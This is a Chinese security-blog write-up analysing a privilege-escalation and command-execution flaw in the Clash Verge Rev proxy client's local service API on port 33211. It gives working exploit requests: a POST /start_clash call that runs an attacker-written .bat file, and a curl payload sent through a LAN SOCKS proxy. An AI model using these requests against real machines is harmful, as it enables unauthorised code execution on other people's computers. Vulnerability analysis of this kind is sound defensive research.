Clash Verge rev提权与命令执行分析

发布于 作者:

Clash Verge rev提权与命令执行分析

原创 zkaq – cs 掌控安全EDU 2025-05-09 04:01

扫码领资料

获网安教程

图片

图片

本文由掌控安全学院 –  c’s 投稿

Track安全社区投稿~

千元稿费!还有保底奖励~( https://bbs.zkaq.cn)

一、基本信息

1.1、漏洞背景

复现时间:
20250429

背景:

https://github.com/clash-verge-rev/clash-verge-rev/issues/3428

1.2、clash生态

  1. Clash内核●Clash是一个开源、跨平台的规则分流代理内核,用Go语言开发,核心功能是多协议代理(如VMess、VLESS、Trojan、Shadowsocks、Socks5、HTTP等)+强大的规则分流。
    ●本质:命令行程序,无GUI,负责流量抓取、转发、分流、协议转换等。●配置:通过YAML文件配置,支持多节点、多规则、多策略组。●功能:分流、UDP/IPv6支持、透明代理、DNS伪装、测速、订阅等。2. Clash GUI生态●Clash for Windows、ClashX(Mac)、Clash Verge/Verge Rev、Meta、Meta for Android等,都是基于Clash内核的图形界面前端,用来简化配置、管理和可视化操作。1.3、Clash Verge Rev是什么1. Clash Verge Rev简介●Clash Verge Rev是一款基于Clash内核的跨平台GUI客户端。●Verge Rev=Verge的分支/二开版本,通常会有更多新特性、优化和自定义功能。●支持Windows、MacOS、Linux等,界面现代、交互友好。2. 架构●前端(GUI):负责用户交互、配置管理、节点展示、规则编辑、流量统计等。●后端(内核):集成Clash核心程序,负责实际的流量抓取、协议解析与分流。●通信:前端通过API/本地端口与Clash内核通信(如RESTful API、WebSocket)。1.4、clash Verge Rev的安全性与架构●GUI和内核分离:理论上GUI和内核可以独立升级,安全性更好。●开源可审计:代码开源,安全人员可自行审计有无后门。●GUI前端:用户操作界面●clash-verge-service:本地服务进程,管理内核和提供接口●Clash内核:真正的网络代理引擎1.5、监听端口clash系列都差不多,常见clash的配置文件:clash-verge-service监听端口:小结一下,端口号作用进程7890、7891代理流量端口(HTTP/SOCKS5)clash-core/meta9090内核 API(external-controller)clash-core/meta33211clash-verge-service 的本地API端口clash-verge-service数据流向:二、漏洞1、提权详细请求数据包,查看日志文件,提权成功辅助测试go程序,代码,代码入口,写入配置,

    这里可以实现任意文件写入,配合多种姿势rce

    针对mac和非mac文件都可以,

    2、转换系统rce复现,代码已经写得很详细了。由于参数不完全可控,RCE 部分会复杂一些。可以考虑这样处理:先发送一个请求,把要执行的命令写入 bat 文件,再通过第二个请求调用这个文件即可。该思路可以用于win和mac。详细请求数据包,写入成功

    第二次请求,

    详细请求数据包POST /start_clash HTTP/1.1Host: 127.0.0.1:33211Content-Type: application/json{“bin_path”: “d:/clash.bat”,”config_dir”: “.”,”config_file”: “.”,”log_file”: “d:/clash.log”}3、进一步利用这个漏洞的影响范围可以更广。特别是当用户在与攻击者相同的局域网环境中开启了局域网功能时,攻击者可以利用clash的代理机制发起直接攻击。payload:curl -x socks5://192.168.xx.xx:xx -X POST "http://127.0.0.1:33211/start_clash" \
    -H "Content-Type: application/json" \
    -d '{
      "bin_path": "xx",
      "config_dir": "xx",
      "config_file": "xx",
      "log_file": "xx"
    }'
    进一步扩大危害的可能?简单来说,这个漏洞可以集成到蜜罐中,当“攻击者”用受影响的clash访问蜜罐时,蜜罐可以自动发起前述两个请求,实现对攻击者的反制。但是经测试未成功,原因是发起JSON格式的POST请求需要CORS支持,这个方案目前行不通。
    申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

图片

**分享后扫码加我!

回顾往期内容

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

记某地级市护网的攻防演练行动

手把手教你CNVD漏洞挖掘 + 资产收集

【精选】SRC快速入门+上分小秘籍+实战指南

代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

图片

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力